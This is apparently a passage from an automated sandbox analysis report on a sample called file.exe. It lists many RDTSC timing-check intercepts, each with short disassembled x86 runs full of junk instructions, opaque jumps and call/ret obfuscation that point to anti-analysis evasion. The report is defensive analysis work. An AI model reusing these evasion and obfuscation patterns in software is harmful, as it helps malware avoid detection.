Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75EDC second address: A75EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75EE0 second address: A75EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7618A second address: A761A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08B70887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7694B second address: A76994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD08D54401h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFD08D54408h 0x00000014 jmp 00007EFD08D54406h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76994 second address: A769AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD08B70876h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007EFD08B7087Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C038 second address: A7C03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7C03E second address: A7C045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E5B0 second address: A7E5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E5B6 second address: A7E5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08B7087Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E5C6 second address: A7E5DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007EFD08D54408h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007EFD08D543F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E5DD second address: A7E5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E74C second address: A7E760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jng 00007EFD08D543F6h 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7E760 second address: A7E766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8552D second address: A85531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8569C second address: A856AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007EFD08B70876h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A85F21 second address: A85F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87E97 second address: A87ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 242D21A9h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007EFD08B70878h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007EFD08B70879h 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87ED2 second address: A87F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007EFD08D543FEh 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007EFD08D54408h 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88086 second address: A8808A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88219 second address: A88228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88228 second address: A8822C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88684 second address: A8868A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8868A second address: A8869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007EFD08B70878h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88766 second address: A8876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8876A second address: A88783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08B70885h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88783 second address: A88787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88F44 second address: A88F4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88F4E second address: A88F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89077 second address: A8908F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08B70884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89318 second address: A8931E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8931E second address: A89325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89800 second address: A89804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89804 second address: A89808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89808 second address: A8984B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007EFD08D543F8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 xor edi, dword ptr [ebp+122D2B66h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D27EEh] 0x00000020 clc 0x00000021 xchg eax, ebx 0x00000022 push edx 0x00000023 jns 00007EFD08D543FCh 0x00000029 pop edx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007EFD08D543FEh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A1F1 second address: A8A1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A1F5 second address: A8A211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D54408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A211 second address: A8A21F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08B7087Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A21F second address: A8A25D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, 09BB89C0h 0x00000011 push 00000000h 0x00000013 jmp 00007EFD08D54406h 0x00000018 push 00000000h 0x0000001a movzx esi, si 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007EFD08D543F6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A25D second address: A8A261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A261 second address: A8A267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A267 second address: A8A276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A276 second address: A8A27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A27A second address: A8A280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8A280 second address: A8A286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B331 second address: A8B337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B337 second address: A8B347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B347 second address: A8B34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B34B second address: A8B3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+122D29C6h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007EFD08D543F8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jns 00007EFD08D54400h 0x00000030 mov dword ptr [ebp+1247B274h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007EFD08D543F8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov si, cx 0x00000055 mov edi, dword ptr [ebp+1244E478h] 0x0000005b xchg eax, ebx 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B3C4 second address: A8B3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B3C8 second address: A8B3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jbe 00007EFD08D54408h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B3DA second address: A8B3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B3DE second address: A8B3E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8BBB6 second address: A8BBEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007EFD08B70876h 0x00000009 jmp 00007EFD08B70888h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jne 00007EFD08B7087Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8BBEC second address: A8BBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C845 second address: A8C849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C5AD second address: A8C5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C849 second address: A8C8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor di, A761h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007EFD08B70878h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b ja 00007EFD08B7087Eh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007EFD08B70878h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d jp 00007EFD08B7087Ch 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8C8B9 second address: A8C8DB instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007EFD08D54402h 0x00000010 jmp 00007EFD08D543FCh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DE40 second address: A8DEB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD08B7087Ch 0x00000008 jne 00007EFD08B70876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+1246E2B8h], edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007EFD08B70878h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 je 00007EFD08B7087Ch 0x0000003b mov dword ptr [ebp+122D259Dh], edi 0x00000041 push 00000000h 0x00000043 call 00007EFD08B7087Ch 0x00000048 adc di, 5600h 0x0000004d pop esi 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007EFD08B70889h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DEB4 second address: A8DEDA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD08D54409h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8DEDA second address: A8DEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8E8EB second address: A8E8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8E8EF second address: A8E8FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007EFD08B70876h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90042 second address: A90048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90048 second address: A90053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007EFD08B70876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90053 second address: A900D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007EFD08D543F8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D22E2h], edx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007EFD08D543F8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D352Eh], edx 0x0000004a jmp 00007EFD08D54406h 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 mov di, si 0x00000055 pop ebx 0x00000056 push eax 0x00000057 jp 00007EFD08D54416h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A900D6 second address: A900DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90EB4 second address: A90EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFD08D54409h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov bh, 3Ch 0x00000014 push 00000000h 0x00000016 or ebx, dword ptr [ebp+122D2438h] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+1244E401h], eax 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007EFD08D543F8h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A91FBD second address: A91FC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A92FB4 second address: A92FD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007EFD08D54400h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95036 second address: A95048 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD08B70876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95048 second address: A9504E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A941D0 second address: A941D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A93248 second address: A93256 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9504E second address: A95053 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95F28 second address: A95F42 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD08D543F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007EFD08D543FCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9519D second address: A951A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95F42 second address: A95F4C instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD08D543FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A951A2 second address: A9524B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD08B7087Fh 0x00000008 jl 00007EFD08B70876h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or edi, dword ptr [ebp+122D320Dh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007EFD08B70878h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jmp 00007EFD08B7087Dh 0x00000047 jbe 00007EFD08B7087Ch 0x0000004d mov dword ptr [ebp+122D1AD8h], edi 0x00000053 mov eax, dword ptr [ebp+122D009Dh] 0x00000059 push 00000000h 0x0000005b push edi 0x0000005c call 00007EFD08B70878h 0x00000061 pop edi 0x00000062 mov dword ptr [esp+04h], edi 0x00000066 add dword ptr [esp+04h], 0000001Ch 0x0000006e inc edi 0x0000006f push edi 0x00000070 ret 0x00000071 pop edi 0x00000072 ret 0x00000073 push FFFFFFFFh 0x00000075 mov dword ptr [ebp+1246E2B8h], ebx 0x0000007b push eax 0x0000007c pushad 0x0000007d push edi 0x0000007e push esi 0x0000007f pop esi 0x00000080 pop edi 0x00000081 jo 00007EFD08B7087Ch 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A960E6 second address: A9616D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFD08D54403h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007EFD08D543F8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 pushad 0x00000027 add dword ptr [ebp+1244D1F3h], eax 0x0000002d popad 0x0000002e jmp 00007EFD08D54406h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov ebx, esi 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov dword ptr [ebp+122D3536h], ecx 0x00000049 mov ebx, dword ptr [ebp+122D34D1h] 0x0000004f mov eax, dword ptr [ebp+122D04A1h] 0x00000055 mov bx, E665h 0x00000059 push FFFFFFFFh 0x0000005b mov edi, esi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 